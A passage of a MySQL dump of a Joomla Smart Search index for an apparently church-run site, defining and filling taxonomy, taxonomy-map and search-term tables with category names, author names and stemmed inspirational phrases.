(306, 328475, 1.00331),
(306, 328476, 1.02669),
(306, 328477, 1.14331),
(306, 328478, 1.09669),
(306, 328479, 1.07331),
(306, 328480, 1.16669),
(306, 328481, 0.95669),
(306, 328482, 1.05),
(306, 328483, 0.95669),
(306, 328484, 1.02669),
(306, 328485, 1.02669),
(306, 328486, 1.05),
(306, 328487, 1.07331),
(306, 328488, 1.09669),
(306, 328489, 1.02669),
(306, 328490, 0.93331),
(306, 328491, 1.05),
(306, 328492, 0.93331),
(306, 328493, 1.00331),
(306, 328494, 1.05),
(306, 328495, 1.12),
(306, 328496, 1.26),
(306, 328497, 1.02669),
(306, 328498, 1.16669),
(308, 328954, 1.14331),
(308, 328955, 1.19);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_taxonomy`
--

CREATE TABLE `y57u5_finder_taxonomy` (
  `id` int(10) UNSIGNED NOT NULL,
  `parent_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL,
  `state` tinyint(1) UNSIGNED NOT NULL DEFAULT '1',
  `access` tinyint(1) UNSIGNED NOT NULL DEFAULT '0',
  `ordering` tinyint(1) UNSIGNED NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_taxonomy`
--

INSERT INTO `y57u5_finder_taxonomy` (`id`, `parent_id`, `title`, `state`, `access`, `ordering`) VALUES
(1, 0, 'ROOT', 0, 0, 0),
(2, 1, 'Type', 1, 1, 0),
(3, 2, 'K2 Item', 1, 1, 0),
(4, 1, 'K2 Category', 1, 1, 0),
(6, 1, 'Language', 1, 1, 0),
(7, 6, '*', 1, 1, 0),
(8, 1, 'Extra fields', 1, 1, 0),
(9, 8, '[]', 1, 1, 0),
(10, 4, 'Finances', 1, 1, 0),
(11, 8, '[{\"id\":\"1\",\"value\":\"1\"}]', 1, 1, 0),
(12, 4, 'Father\'s Heart', 1, 1, 0),
(13, 1, 'Author', 1, 1, 0),
(18, 13, 'Rev Olusola Ayodele', 1, 1, 0),
(22, 4, 'Courtship & Marriage', 1, 1, 0),
(24, 4, 'Faith', 1, 1, 0),
(29, 2, 'Event', 1, 1, 0),
(30, 1, 'Category', 1, 1, 0),
(31, 30, 'LOIC', 1, 1, 0),
(33, 13, 'Lifeoasis', 1, 1, 0),
(34, 30, 'Default', 1, 1, 0),
(40, 13, 'Rev (Mrs) Oyenike Areogun', 1, 1, 0),
(41, 4, 'Family & Women', 1, 1, 0),
(42, 13, 'Rev Olusola Ayodele Areogun', 1, 1, 0),
(44, 4, 'Healing', 1, 1, 0);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_taxonomy_map`
--

CREATE TABLE `y57u5_finder_taxonomy_map` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `node_id` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_taxonomy_map`
--

INSERT INTO `y57u5_finder_taxonomy_map` (`link_id`, `node_id`) VALUES
(31, 3),
(31, 7),
(31, 9),
(31, 18),
(31, 22),
(44, 29),
(44, 31),
(45, 29),
(45, 34),
(46, 29),
(46, 31),
(47, 29),
(47, 31),
(48, 29),
(48, 31),
(49, 29),
(49, 31),
(50, 29),
(50, 31),
(159, 3),
(159, 7),
(159, 10),
(159, 11),
(159, 18),
(160, 3),
(160, 7),
(160, 10),
(160, 11),
(160, 18),
(161, 3),
(161, 7),
(161, 9),
(161, 10),
(168, 3),
(168, 7),
(168, 9),
(168, 40),
(168, 41),
(174, 3),
(174, 7),
(174, 9),
(174, 41),
(174, 42),
(178, 3),
(178, 7),
(178, 9),
(178, 40),
(178, 41),
(193, 3),
(193, 7),
(193, 9),
(193, 10),
(193, 33),
(233, 3),
(233, 7),
(233, 9),
(233, 24),
(233, 33),
(235, 3),
(235, 7),
(235, 9),
(235, 24),
(235, 33),
(236, 3),
(236, 7),
(236, 9),
(236, 24),
(236, 33),
(237, 3),
(237, 7),
(237, 9),
(237, 24),
(237, 42),
(238, 3),
(238, 7),
(238, 9),
(238, 24),
(238, 33),
(239, 3),
(239, 7),
(239, 9),
(239, 24),
(239, 33),
(240, 3),
(240, 7),
(240, 9),
(240, 24),
(240, 33),
(241, 3),
(241, 7),
(241, 9),
(241, 24),
(241, 33),
(242, 3),
(242, 7),
(242, 9),
(242, 24),
(242, 33),
(243, 3),
(243, 7),
(243, 9),
(243, 24),
(243, 33),
(244, 3),
(244, 7),
(244, 9),
(244, 24),
(244, 33),
(245, 3),
(245, 7),
(245, 9),
(245, 24),
(245, 33),
(246, 3),
(246, 7),
(246, 9),
(246, 24),
(246, 33),
(247, 3),
(247, 7),
(247, 9),
(247, 24),
(247, 33),
(248, 3),
(248, 7),
(248, 9),
(248, 24),
(248, 33),
(249, 3),
(249, 7),
(249, 9),
(249, 24),
(249, 33),
(250, 3),
(250, 7),
(250, 9),
(250, 12),
(250, 42),
(251, 3),
(251, 7),
(251, 9),
(251, 12),
(251, 42),
(252, 3),
(252, 7),
(252, 9),
(252, 12),
(252, 42),
(253, 3),
(253, 7),
(253, 9),
(253, 12),
(253, 42),
(254, 3),
(254, 7),
(254, 9),
(254, 12),
(254, 42),
(255, 3),
(255, 7),
(255, 9),
(255, 12),
(255, 33),
(256, 3),
(256, 7),
(256, 9),
(256, 12),
(256, 42),
(257, 3),
(257, 7),
(257, 9),
(257, 12),
(257, 33),
(258, 3),
(258, 7),
(258, 9),
(258, 12),
(258, 33),
(259, 3),
(259, 7),
(259, 9),
(259, 12),
(259, 33),
(260, 3),
(260, 7),
(260, 9),
(260, 12),
(260, 33),
(261, 3),
(261, 7),
(261, 9),
(261, 12),
(261, 33),
(262, 3),
(262, 7),
(262, 9),
(262, 12),
(262, 33),
(263, 3),
(263, 7),
(263, 9),
(263, 12),
(263, 33),
(264, 3),
(264, 7),
(264, 9),
(264, 12),
(264, 33),
(265, 3),
(265, 7),
(265, 9),
(265, 12),
(265, 42),
(266, 3),
(266, 7),
(266, 9),
(266, 12),
(266, 42),
(267, 3),
(267, 7),
(267, 9),
(267, 12),
(267, 42),
(268, 3),
(268, 7),
(268, 9),
(268, 12),
(268, 42),
(269, 3),
(269, 7),
(269, 9),
(269, 12),
(269, 42),
(270, 3),
(270, 7),
(270, 9),
(270, 12),
(270, 42),
(272, 3),
(272, 7),
(272, 9),
(272, 12),
(272, 42),
(273, 3),
(273, 7),
(273, 9),
(273, 12),
(273, 42),
(274, 3),
(274, 7),
(274, 9),
(274, 12),
(274, 42),
(275, 3),
(275, 7),
(275, 9),
(275, 12),
(275, 42),
(280, 3),
(280, 7),
(280, 9),
(280, 12),
(280, 42),
(287, 3),
(287, 7),
(287, 9),
(287, 24),
(287, 33),
(288, 3),
(288, 7),
(288, 9),
(288, 12),
(288, 42),
(290, 3),
(290, 7),
(290, 9),
(290, 12),
(290, 42),
(292, 3),
(292, 7),
(292, 9),
(292, 12),
(292, 42),
(294, 3),
(294, 7),
(294, 9),
(294, 40),
(294, 44),
(295, 3),
(295, 7),
(295, 9),
(295, 24),
(295, 33),
(298, 3),
(298, 7),
(298, 9),
(298, 24),
(298, 33),
(299, 3),
(299, 7),
(299, 9),
(299, 24),
(299, 42),
(301, 3),
(301, 7),
(301, 9),
(301, 12),
(301, 42),
(304, 3),
(304, 7),
(304, 9),
(304, 12),
(304, 33),
(305, 3),
(305, 7),
(305, 9),
(305, 12),
(305, 33),
(306, 3),
(306, 7),
(306, 9),
(306, 24),
(306, 33),
(308, 3),
(308, 7),
(308, 9),
(308, 24),
(308, 33);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_terms`
--

CREATE TABLE `y57u5_finder_terms` (
  `term_id` int(10) UNSIGNED NOT NULL,
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint(1) UNSIGNED NOT NULL DEFAULT '0',
  `phrase` tinyint(1) UNSIGNED NOT NULL DEFAULT '0',
  `weight` float UNSIGNED NOT NULL DEFAULT '0',
  `soundex` varchar(75) NOT NULL,
  `links` int(10) NOT NULL DEFAULT '0',
  `language` char(3) NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_terms`
--

INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(1, '', '', 0, 0, 0, '', 62, '*'),
(5, 'a', 'a', 0, 0, 0.0667, 'A000', 63, '*'),
(6, 'a humble', 'a humble', 0, 1, 1.2667, 'A514', 4, '*'),
(7, 'a humble but', 'a humble but', 0, 1, 1.4, 'A51413', 4, '*'),
(8, 'a living', 'a living', 0, 1, 1.2667, 'A4152', 5, '*'),
(9, 'a living the', 'a living the', 0, 1, 1.4, 'A41523', 5, '*'),
(10, 'a part', 'a part', 0, 1, 1.2, 'A163', 8, '*'),
(11, 'a part of', 'a part of', 0, 1, 1.3, 'A1631', 8, '*'),
(12, 'abilities', 'abil', 0, 0, 0.6, 'A1432', 4, '*'),
(13, 'abilities without', 'abil without', 0, 1, 1.5667, 'A14323', 4, '*'),
(14, 'abilities without a', 'abil without a', 0, 1, 1.6333, 'A14323', 4, '*'),
(15, 'adaptable', 'adapt', 0, 0, 0.6, 'A31314', 5, '*'),
(16, 'adaptable to', 'adapt to', 0, 1, 1.4, 'A313143', 5, '*'),
(17, 'adaptable to change', 'adapt to change', 0, 1, 1.6333, 'A313143252', 5, '*'),
(18, 'all', 'all', 0, 0, 0.2, 'A400', 52, '*'),
(19, 'all changes', 'all changes', 0, 1, 1.3667, 'A4252', 5, '*'),
(20, 'all changes even', 'all changes even', 0, 1, 1.5333, 'A425215', 5, '*'),
(21, 'all peoples', 'all peoples', 0, 1, 1.3667, 'A4142', 3, '*'),
(22, 'all peoples cry', 'all peoples cry', 0, 1, 1.5, 'A41426', 3, '*'),
(23, 'alone', 'alon', 0, 0, 0.3333, 'A450', 10, '*'),
(24, 'alone this', 'alon this', 0, 1, 1.3333, 'A4532', 5, '*'),
(25, 'alone this is', 'alon this is', 0, 1, 1.4333, 'A4532', 5, '*'),
(26, 'and', 'and', 0, 0, 0.2, 'A530', 68, '*'),
(27, 'and die', 'and die', 0, 1, 1.2333, 'A530', 3, '*'),
(28, 'and die it', 'and die it', 0, 1, 1.3333, 'A530', 3, '*'),
(29, 'and just', 'and just', 0, 1, 1.2667, 'A5323', 5, '*'),
(30, 'and just leave', 'and just leave', 0, 1, 1.4667, 'A532341', 5, '*'),
(31, 'and understand', 'and understand', 0, 1, 1.4667, 'A535362353', 3, '*'),
(32, 'and understand each', 'and understand each', 0, 1, 1.6333, 'A5353623532', 3, '*'),
(33, 'another', 'anoth', 0, 0, 0.4667, 'A536', 18, '*'),
(34, 'another blockquote', 'anoth blockquote', 0, 1, 1.6, 'A5361423', 4, '*'),
(35, 'another blockquote author', 'anoth blockquote author', 0, 1, 1.8333, 'A53614236', 4, '*'),
(36, 'are', 'ar', 0, 0, 0.2, 'A600', 57, '*'),
(37, 'are the', 'ar the', 0, 1, 1.2333, 'A630', 10, '*'),
(38, 'are the change', 'ar the change', 0, 1, 1.4667, 'A63252', 5, '*'),
(39, 'are the ones', 'ar the ones', 0, 1, 1.4, 'A6352', 7, '*'),
(40, 'around', 'around', 0, 0, 0.4, 'A653', 15, '*'),
(41, 'around saying', 'around saying', 0, 1, 1.4333, 'A653252', 5, '*'),
(42, 'around saying the', 'around saying the', 0, 1, 1.5667, 'A6532523', 5, '*'),
(43, 'attitude', 'attitud', 0, 0, 0.5333, 'A300', 10, '*'),
(44, 'attitude change', 'attitud change', 0, 1, 1.5, 'A3252', 5, '*'),
(45, 'attitude change will', 'attitud change will', 0, 1, 1.6667, 'A32524', 5, '*'),
(46, 'author', 'author', 0, 0, 0.4, 'A360', 4, '*'),
(47, 'author unknown', 'author unknown', 0, 1, 1.4667, 'A36525', 4, '*'),
(48, 'author unknown believe', 'author unknown believe', 0, 1, 1.7333, 'A36525141', 4, '*'),
(49, 'be', 'be', 0, 0, 0.1333, 'B000', 59, '*'),
(50, 'be full', 'be full', 0, 1, 1.2333, 'B400', 6, '*'),
(51, 'be full of', 'be full of', 0, 1, 1.3333, 'B410', 6, '*'),
(52, 'be successful', 'be successful', 0, 1, 1.4333, 'B214', 4, '*'),
(53, 'be successful or', 'be successful or', 0, 1, 1.5333, 'B2146', 4, '*'),
(54, 'become', 'becom', 0, 0, 0.4, 'B250', 25, '*'),
(55, 'become friends', 'becom friends', 0, 1, 1.4667, 'B2516532', 3, '*'),
(56, 'become friends don\'t', 'becom friends don', 0, 1, 1.6667, 'B2516532353', 3, '*'),
(57, 'been', 'been', 0, 0, 0.2667, 'B500', 16, '*'),
(58, 'been waiting', 'been waiting', 0, 1, 1.4, 'B5352', 5, '*'),
(59, 'been waiting for', 'been waiting for', 0, 1, 1.5333, 'B535216', 5, '*'),
(60, 'before', 'befor', 0, 0, 0.4, 'B600', 31, '*'),
(61, 'before we', 'befor we', 0, 1, 1.3, 'B600', 6, '*'),
(62, 'before we can', 'befor we can', 0, 1, 1.4333, 'B625', 5, '*'),
(63, 'behind', 'behind', 0, 0, 0.4, 'B530', 8, '*'),
(64, 'behind us', 'behind us', 0, 1, 1.3, 'B532', 5, '*'),
(65, 'behind us is', 'behind us is', 0, 1, 1.4, 'B532', 5, '*'),
(66, 'believe', 'believ', 0, 0, 0.4667, 'B410', 9, '*'),
(67, 'believe in', 'believ in', 0, 1, 1.3333, 'B415', 6, '*'),
(68, 'believe in yourself', 'believ in yourself', 0, 1, 1.6333, 'B4156241', 4, '*'),
(69, 'bigotry', 'bigotri', 0, 0, 0.4667, 'B236', 3, '*'),
(70, 'bigotry but', 'bigotri but', 0, 1, 1.3667, 'B23613', 3, '*'),
(71, 'bigotry but by', 'bigotri but by', 0, 1, 1.4667, 'B236131', 3, '*'),
(72, 'blockquote', 'blockquot', 0, 0, 0.6667, 'B423', 4, '*'),
(73, 'blockquote author', 'blockquot author', 0, 1, 1.5667, 'B4236', 4, '*'),
(74, 'blockquote author unknown', 'blockquot author unknown', 0, 1, 1.8333, 'B4236525', 4, '*'),
(75, 'blockquote take', 'blockquot take', 0, 1, 1.5, 'B4232', 4, '*'),
(76, 'blockquote take up', 'blockquot take up', 0, 1, 1.6, 'B42321', 4, '*'),
(77, 'blog', 'blog', 0, 0, 0.2667, 'B420', 2, '*'),
(82, 'body', 'bodi', 0, 0, 0.2667, 'B300', 15, '*'),
(83, 'body be', 'bodi be', 0, 1, 1.2333, 'B310', 5, '*'),
(84, 'body be full', 'bodi be full', 0, 1, 1.4, 'B314', 5, '*'),
(85, 'brain', 'brain', 0, 0, 0.3333, 'B650', 7, '*'),
(86, 'brain muscles', 'brain muscles', 0, 1, 1.4333, 'B65242', 5, '*'),
(87, 'brain muscles nerves', 'brain muscles nerves', 0, 1, 1.6667, 'B652425612', 5, '*'),
(88, 'but', 'but', 0, 0, 0.2, 'B300', 53, '*'),
(89, 'but by', 'but by', 0, 1, 1.2, 'B310', 4, '*'),
(90, 'but by demonstrating', 'but by demonstrating', 0, 1, 1.6667, 'B3135236352', 3, '*'),
(91, 'but reasonable', 'but reasonable', 0, 1, 1.4667, 'B362514', 4, '*'),
(92, 'but reasonable confidence', 'but reasonable confidence', 0, 1, 1.8333, 'B362514251352', 4, '*'),
(93, 'by', 'by', 0, 0, 0.1333, 'B000', 36, '*'),
(94, 'by demonstrating', 'by demonstrating', 0, 1, 1.5333, 'B35236352', 3, '*'),
(95, 'by demonstrating that', 'by demonstrating that', 0, 1, 1.7, 'B352363523', 3, '*'),
(96, 'can', 'can', 0, 0, 0.2, 'C500', 43, '*'),
(97, 'can enter', 'can enter', 0, 1, 1.3, 'C536', 5, '*'),
(98, 'can enter another', 'can enter another', 0, 1, 1.5667, 'C536536', 5, '*'),
(99, 'can introduce', 'can introduce', 0, 1, 1.4333, 'C53632', 3, '*'),
(100, 'can introduce the', 'can introduce the', 0, 1, 1.5667, 'C536323', 3, '*'),
(101, 'can\'t', 'can', 0, 0, 0.3333, 'C530', 24, '*'),
(102, 'can\'t change', 'can change', 0, 1, 1.4, 'C53252', 5, '*'),
(103, 'can\'t change it', 'can change it', 0, 1, 1.5, 'C532523', 5, '*'),
(104, 'cannot', 'cannot', 0, 0, 0.4, 'C530', 20, '*'),
(105, 'cannot be', 'cannot be', 0, 1, 1.3, 'C531', 7, '*'),
(106, 'cannot be successful', 'cannot be successful', 0, 1, 1.6667, 'C531214', 4, '*'),
(107, 'cannot prevent', 'cannot prevent', 0, 1, 1.4667, 'C5316153', 3, '*'),
(108, 'cannot prevent bigotry', 'cannot prevent bigotry', 0, 1, 1.7333, 'C53161531236', 3, '*'),
(114, 'change', 'chang', 0, 0, 0.4, 'C520', 14, '*'),
(115, 'change all', 'chang all', 0, 1, 1.3333, 'C524', 5, '*'),
(116, 'change all changes', 'chang all changes', 0, 1, 1.6, 'C524252', 5, '*'),
(117, 'change it', 'chang it', 0, 1, 1.3, 'C523', 5, '*'),
(118, 'change it change', 'chang it change', 0, 1, 1.5333, 'C523252', 5, '*'),
(119, 'change it if', 'chang it if', 0, 1, 1.4, 'C5231', 5, '*'),
(120, 'change that', 'chang that', 0, 1, 1.3667, 'C523', 5, '*'),
(121, 'change that we', 'chang that we', 0, 1, 1.4667, 'C523', 5, '*'),
(122, 'change will', 'chang will', 0, 1, 1.3667, 'C524', 5, '*'),
(123, 'change will not', 'chang will not', 0, 1, 1.5, 'C52453', 5, '*'),
(124, 'change your', 'chang your', 0, 1, 1.3667, 'C526', 6, '*'),
(125, 'change your attitude', 'chang your attitude', 0, 1, 1.6667, 'C5263', 5, '*'),
(126, 'changes', 'chang', 0, 0, 0.4667, 'C520', 10, '*'),
(127, 'changes even', 'chang even', 0, 1, 1.4, 'C5215', 5, '*'),
(128, 'changes even the', 'chang even the', 0, 1, 1.5333, 'C52153', 5, '*'),
(129, 'come', 'come', 0, 0, 0.2667, 'C500', 36, '*'),
(130, 'come if', 'come if', 0, 1, 1.2333, 'C510', 5, '*'),
(131, 'come if we', 'come if we', 0, 1, 1.3333, 'C510', 5, '*'),
(135, 'confidence', 'confid', 0, 0, 0.6667, 'C51352', 9, '*'),
(136, 'confidence in', 'confid in', 0, 1, 1.4333, 'C513525', 8, '*'),
(137, 'confidence in your', 'confid in your', 0, 1, 1.6, 'C5135256', 4, '*'),
(140, 'cry', 'cry', 0, 0, 0.2, 'C600', 3, '*'),
(141, 'cry laugh', 'cry laugh', 0, 1, 1.3, 'C642', 3, '*'),
(142, 'cry laugh eat', 'cry laugh eat', 0, 1, 1.4333, 'C6423', 3, '*'),
(143, 'demonstrating', 'demonstr', 0, 0, 0.8667, 'D5236352', 3, '*'),
(144, 'demonstrating that', 'demonstr that', 0, 1, 1.6, 'D52363523', 3, '*'),
(145, 'demonstrating that all', 'demonstr that all', 0, 1, 1.7333, 'D523635234', 3, '*'),
(146, 'die', 'die', 0, 0, 0.2, 'D000', 10, '*'),
(147, 'die it', 'die it', 0, 1, 1.2, 'D000', 3, '*'),
(148, 'die it can', 'die it can', 0, 1, 1.3333, 'D250', 3, '*'),
(149, 'die to', 'die to', 0, 1, 1.2, 'D000', 6, '*'),
(150, 'die to one', 'die to one', 0, 1, 1.3333, 'D500', 5, '*'),
(151, 'digital', 'digit', 0, 0, 0.4667, 'D234', 1, '*'),
(152, 'digital blog', 'digit blog', 0, 1, 1.4, 'D234142', 1, '*'),
(154, 'don\'t', 'don', 0, 0, 0.3333, 'D530', 46, '*'),
(155, 'don\'t go', 'don go', 0, 1, 1.2667, 'D532', 5, '*'),
(156, 'don\'t go around', 'don go around', 0, 1, 1.5, 'D532653', 5, '*'),
(157, 'don\'t like', 'don like', 0, 1, 1.3333, 'D5342', 5, '*'),
(158, 'don\'t like something', 'don like something', 0, 1, 1.6667, 'D53425352', 5, '*'),
(159, 'dream', 'dream', 0, 0, 0.3333, 'D650', 16, '*'),
(160, 'dream of', 'dream of', 0, 1, 1.2667, 'D651', 5, '*'),
(161, 'dream of it', 'dream of it', 0, 1, 1.3667, 'D6513', 5, '*'),
(162, 'each', 'each', 0, 0, 0.2667, 'E200', 4, '*'),
(163, 'each other', 'each other', 0, 1, 1.3333, 'E236', 3, '*'),
(164, 'each other we', 'each other we', 0, 1, 1.4333, 'E236', 3, '*'),
(165, 'eat', 'eat', 0, 0, 0.2, 'E300', 9, '*'),
(166, 'eat worry', 'eat worry', 0, 1, 1.3, 'E360', 3, '*'),
(167, 'eat worry and', 'eat worry and', 0, 1, 1.4333, 'E3653', 3, '*'),
(168, 'enter', 'enter', 0, 0, 0.3333, 'E536', 9, '*'),
(169, 'enter another', 'enter another', 0, 1, 1.4333, 'E536536', 5, '*'),
(170, 'enter another blockquote', 'enter another blockquote', 0, 1, 1.8, 'E5365361423', 4, '*'),
(171, 'even', 'even', 0, 0, 0.2667, 'E150', 25, '*'),
(172, 'even become', 'even become', 0, 1, 1.3667, 'E15125', 3, '*'),
(173, 'even become friends', 'even become friends', 0, 1, 1.6333, 'E1512516532', 3, '*'),
(174, 'even the', 'even the', 0, 1, 1.2667, 'E153', 5, '*'),
(175, 'even the most', 'even the most', 0, 1, 1.4333, 'E153523', 5, '*'),
(176, 'every', 'everi', 0, 0, 0.3333, 'E160', 33, '*'),
(177, 'every other', 'everi other', 0, 1, 1.3667, 'E1636', 11, '*'),
(178, 'every other idea', 'everi other idea', 0, 1, 1.5333, 'E16363', 5, '*'),
(179, 'every part', 'everi part', 0, 1, 1.3333, 'E16163', 5, '*'),
(180, 'every part of', 'everi part of', 0, 1, 1.4333, 'E161631', 5, '*'),
(181, 'faith', 'faith', 0, 0, 0.3333, 'F300', 33, '*'),
(182, 'faith in', 'faith in', 0, 1, 1.2667, 'F350', 6, '*'),
(183, 'faith in your', 'faith in your', 0, 1, 1.4333, 'F356', 4, '*'),
(184, 'first', 'first', 0, 0, 0.3333, 'F623', 19, '*'),
(185, 'first if', 'first if', 0, 1, 1.2667, 'F6231', 5, '*'),
(186, 'first if you', 'first if you', 0, 1, 1.4, 'F6231', 5, '*'),
(187, 'for', 'for', 0, 0, 0.2, 'F600', 60, '*'),
(188, 'for have', 'for have', 0, 1, 1.2667, 'F610', 5, '*'),
(189, 'for have their', 'for have their', 0, 1, 1.4667, 'F6136', 5, '*'),
(190, 'for some', 'for some', 0, 1, 1.2667, 'F625', 5, '*'),
(191, 'for some other', 'for some other', 0, 1, 1.4667, 'F62536', 5, '*'),
(192, 'for we', 'for we', 0, 1, 1.2, 'F600', 7, '*'),
(193, 'for we are', 'for we are', 0, 1, 1.3333, 'F600', 6, '*'),
(194, 'for what', 'for what', 0, 1, 1.2667, 'F630', 6, '*'),
(195, 'for what we', 'for what we', 0, 1, 1.3667, 'F630', 5, '*'),
(196, 'friends', 'friend', 0, 0, 0.4667, 'F6532', 7, '*'),
(197, 'friends don\'t', 'friend don', 0, 1, 1.4333, 'F6532353', 3, '*'),
(198, 'friends don\'t go', 'friend don go', 0, 1, 1.5333, 'F65323532', 3, '*'),
(201, 'full', 'full', 0, 0, 0.2667, 'F400', 10, '*'),
(202, 'full of', 'full of', 0, 1, 1.2333, 'F410', 8, '*'),
(203, 'full of that', 'full of that', 0, 1, 1.4, 'F413', 5, '*'),
(204, 'go', 'go', 0, 0, 0.1333, 'G000', 44, '*'),
(205, 'go around', 'go around', 0, 1, 1.3, 'G653', 5, '*'),
(206, 'go around saying', 'go around saying', 0, 1, 1.5333, 'G653252', 5, '*'),
(207, 'happy', 'happi', 0, 0, 0.3333, 'H100', 4, '*'),
(208, 'happy blockquote', 'happi blockquote', 0, 1, 1.5333, 'H1423', 4, '*'),
(209, 'happy blockquote take', 'happi blockquote take', 0, 1, 1.7, 'H14232', 4, '*'),
(210, 'have', 'have', 0, 0, 0.2667, 'H100', 51, '*'),
(211, 'have faith', 'have faith', 0, 1, 1.3333, 'H130', 4, '*'),
(212, 'have faith in', 'have faith in', 0, 1, 1.4333, 'H135', 4, '*'),
(213, 'have their', 'have their', 0, 1, 1.3333, 'H136', 5, '*'),
(214, 'have their melancholy', 'have their melancholy', 0, 1, 1.7, 'H13654524', 5, '*'),
(215, 'here', 'here', 0, 0, 0.2667, 'H600', 14, '*'),
(216, 'here first', 'here first', 0, 1, 1.3333, 'H61623', 5, '*'),
(217, 'here first if', 'here first if', 0, 1, 1.4333, 'H616231', 5, '*'),
(218, 'humble', 'humbl', 0, 0, 0.4, 'H514', 4, '*'),
(219, 'humble but', 'humbl but', 0, 1, 1.3333, 'H51413', 4, '*'),
(220, 'humble but reasonable', 'humbl but reasonable', 0, 1, 1.7, 'H5141362514', 4, '*'),
(221, 'idea', 'idea', 0, 0, 0.2667, 'I300', 7, '*'),
(222, 'idea alone', 'idea alone', 0, 1, 1.3333, 'I345', 5, '*'),
(223, 'idea alone this', 'idea alone this', 0, 1, 1.5, 'I34532', 5, '*'),
(224, 'idea and', 'idea and', 0, 1, 1.2667, 'I353', 5, '*'),
(225, 'idea and just', 'idea and just', 0, 1, 1.4333, 'I35323', 5, '*'),
(226, 'idea let', 'idea let', 0, 1, 1.2667, 'I343', 6, '*'),
(227, 'idea let the', 'idea let the', 0, 1, 1.4, 'I343', 5, '*'),
(228, 'idea make', 'idea make', 0, 1, 1.3, 'I352', 5, '*'),
(229, 'idea make that', 'idea make that', 0, 1, 1.4667, 'I3523', 5, '*'),
(230, 'idea that', 'idea that', 0, 1, 1.3, 'I300', 4, '*'),
(231, 'idea that if', 'idea that if', 0, 1, 1.4, 'I310', 3, '*'),
(232, 'idea your', 'idea your', 0, 1, 1.3, 'I360', 5, '*'),
(233, 'idea your life', 'idea your life', 0, 1, 1.4667, 'I3641', 5, '*'),
(234, 'if', 'if', 0, 0, 0.1333, 'I100', 44, '*'),
(235, 'if we', 'if we', 0, 1, 1.1667, 'I100', 6, '*'),
(236, 'if we try', 'if we try', 0, 1, 1.3, 'I136', 3, '*'),
(237, 'if we wait', 'if we wait', 0, 1, 1.3333, 'I130', 5, '*'),
(238, 'if you', 'if you', 0, 1, 1.2, 'I100', 32, '*'),
(239, 'if you can\'t', 'if you can', 0, 1, 1.4, 'I1253', 5, '*'),
(240, 'if you don\'t', 'if you don', 0, 1, 1.4, 'I1353', 8, '*'),
(241, 'in', 'in', 0, 0, 0.1333, 'I500', 62, '*'),
(242, 'in your', 'in your', 0, 1, 1.2333, 'I560', 34, '*'),
(243, 'in your abilities', 'in your abilities', 0, 1, 1.5667, 'I561432', 4, '*'),
(244, 'in your own', 'in your own', 0, 1, 1.3667, 'I565', 4, '*'),
(245, 'in yourself', 'in yourself', 0, 1, 1.3667, 'I56241', 6, '*'),
(246, 'in yourself have', 'in yourself have', 0, 1, 1.5333, 'I56241', 4, '*'),
(250, 'intelligent', 'intellig', 0, 0, 0.7333, 'I534253', 5, '*'),
(251, 'intelligent that', 'intellig that', 0, 1, 1.5333, 'I534253', 5, '*'),
(252, 'intelligent that survives', 'intellig that survives', 0, 1, 1.8333, 'I5342532612', 5, '*'),
(253, 'introduce', 'introduc', 0, 0, 0.6, 'I53632', 4, '*'),
(254, 'introduce the', 'introduc the', 0, 1, 1.4333, 'I536323', 3, '*'),
(255, 'introduce the idea', 'introduc the idea', 0, 1, 1.6, 'I536323', 3, '*'),
(256, 'is', 'is', 0, 0, 0.1333, 'I200', 61, '*'),
(257, 'is a', 'is a', 0, 1, 1.1333, 'I200', 44, '*'),
(258, 'is a part', 'is a part', 0, 1, 1.3, 'I2163', 5, '*'),
(259, 'is not', 'is not', 0, 1, 1.2, 'I253', 32, '*'),
(260, 'is not the', 'is not the', 0, 1, 1.3333, 'I253', 9, '*'),
(261, 'is the', 'is the', 0, 1, 1.2, 'I230', 30, '*'),
(262, 'is the most', 'is the most', 0, 1, 1.3667, 'I23523', 5, '*'),
(263, 'is the one', 'is the one', 0, 1, 1.3333, 'I235', 5, '*'),
(264, 'is the way', 'is the way', 0, 1, 1.3333, 'I230', 6, '*'),
(265, 'it', 'it', 0, 0, 0.1333, 'I300', 57, '*'),
(266, 'it can', 'it can', 0, 1, 1.2, 'I325', 7, '*'),
(267, 'it can introduce', 'it can introduce', 0, 1, 1.5333, 'I3253632', 3, '*'),
(268, 'it change', 'it change', 0, 1, 1.3, 'I3252', 5, '*'),
(269, 'it change your', 'it change your', 0, 1, 1.4667, 'I32526', 5, '*'),
(270, 'it dream', 'it dream', 0, 1, 1.2667, 'I365', 5, '*'),
(271, 'it dream of', 'it dream of', 0, 1, 1.3667, 'I3651', 5, '*'),
(272, 'it if', 'it if', 0, 1, 1.1667, 'I310', 5, '*'),
(273, 'it if you', 'it if you', 0, 1, 1.3, 'I310', 5, '*'),
(274, 'it is', 'it is', 0, 1, 1.1667, 'I320', 39, '*'),
(275, 'it is not', 'it is not', 0, 1, 1.3, 'I3253', 11, '*'),
(276, 'it is the', 'it is the', 0, 1, 1.3, 'I323', 9, '*'),
(277, 'it live', 'it live', 0, 1, 1.2333, 'I341', 5, '*'),
(278, 'it live on', 'it live on', 0, 1, 1.3333, 'I3415', 5, '*'),
(279, 'it was', 'it was', 0, 1, 1.2, 'I320', 12, '*'),
(280, 'it was here', 'it was here', 0, 1, 1.3667, 'I326', 5, '*'),
(281, 'item', 'item', 0, 0, 0.2667, 'I350', 64, '*'),
(284, 'just', 'just', 0, 0, 0.2667, 'J300', 36, '*'),
(285, 'just leave', 'just leave', 0, 1, 1.3333, 'J341', 5, '*'),
(286, 'just leave every', 'just leave every', 0, 1, 1.5333, 'J3416', 5, '*'),
(287, 'k2', 'k2', 0, 0, 0.1333, 'K000', 64, '*'),
